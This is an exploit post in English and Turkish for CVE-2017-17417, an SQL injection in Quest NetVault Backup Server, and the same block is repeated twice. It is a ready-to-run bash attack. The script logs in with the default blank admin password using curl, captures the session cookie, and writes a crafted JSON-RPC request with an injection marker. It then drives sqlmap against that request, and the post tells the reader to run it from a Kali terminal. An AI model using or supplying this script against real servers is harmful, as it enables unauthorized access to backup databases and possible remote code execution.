# Exploit Title/Exploit Başlığı: Quest NetVault Backup Server < 11.4.5 Process Manager Service SQL Injection Remote Code Execution Vulnerability (ZDI-17-982)
# Date/Tarih: 2-21-2019
# Exploit Author/Exploit Yazarı: credit goes to rgod for finding the bug
# Version/Versiyon: Quest NetVault Backup Server < 11.4.5
# CVE : CVE-2017-17417
# Bu kodları kali terminalde çalıştırın :
#target ip address
target=x.x.x.x
#target port
port=8443
#username
username=admin
#password is blank by default!/şifre standart olarak boş.
password=
cookie=$(curl -i -s -k -X $'POST' -H $'Content-Length: 109' -H $'Content-Type: application/json-rpc; charset=UTF-8' --data-binary "{"jsonrpc":"2.0","method":"Logon","params":{"OutputFormat":"pretty","UserName":"$username","Password":"$password"},"id":1}" "https://$target:$port/query" | grep SessionCookie | cut -d '"' -f4)
cat > dellSqlmap <<EOF
POST /query HTTP/1.1
Host: $target:$port
Connection: close
Content-Length: 129
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
SessionCookie: $cookie
Content-Type: application/json-rpc; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"jsonrpc":"2.0","method":"GET","params":{"classname":"NVBUPhaseStatus","updates":"none","where":"1=1*"},"id":1}
EOF
sqlmap -r dellSqlmap --force-ssl --level=5 --dbms=postgresql --prefix='' --suffix='' --test-filter='AND boolean-based blind - WHERE or HAVING clause' --batch
Exploit Linki : https://cxsecurity.com/issue/WLB-2019020238
# Date/Tarih: 2-21-2019
# Exploit Author/Exploit Yazarı: credit goes to rgod for finding the bug
# Version/Versiyon: Quest NetVault Backup Server < 11.4.5
# CVE : CVE-2017-17417
# Bu kodları kali terminalde çalıştırın :
#target ip address
target=x.x.x.x
#target port
port=8443
#username
username=admin
#password is blank by default!/şifre standart olarak boş.
password=
cookie=$(curl -i -s -k -X $'POST' -H $'Content-Length: 109' -H $'Content-Type: application/json-rpc; charset=UTF-8' --data-binary "{"jsonrpc":"2.0","method":"Logon","params":{"OutputFormat":"pretty","UserName":"$username","Password":"$password"},"id":1}" "https://$target:$port/query" | grep SessionCookie | cut -d '"' -f4)
cat > dellSqlmap <<EOF
POST /query HTTP/1.1
Host: $target:$port
Connection: close
Content-Length: 129
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
SessionCookie: $cookie
Content-Type: application/json-rpc; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"jsonrpc":"2.0","method":"GET","params":{"classname":"NVBUPhaseStatus","updates":"none","where":"1=1*"},"id":1}
EOF
sqlmap -r dellSqlmap --force-ssl --level=5 --dbms=postgresql --prefix='' --suffix='' --test-filter='AND boolean-based blind - WHERE or HAVING clause' --batch
Exploit Linki : https://cxsecurity.com/issue/WLB-2019020238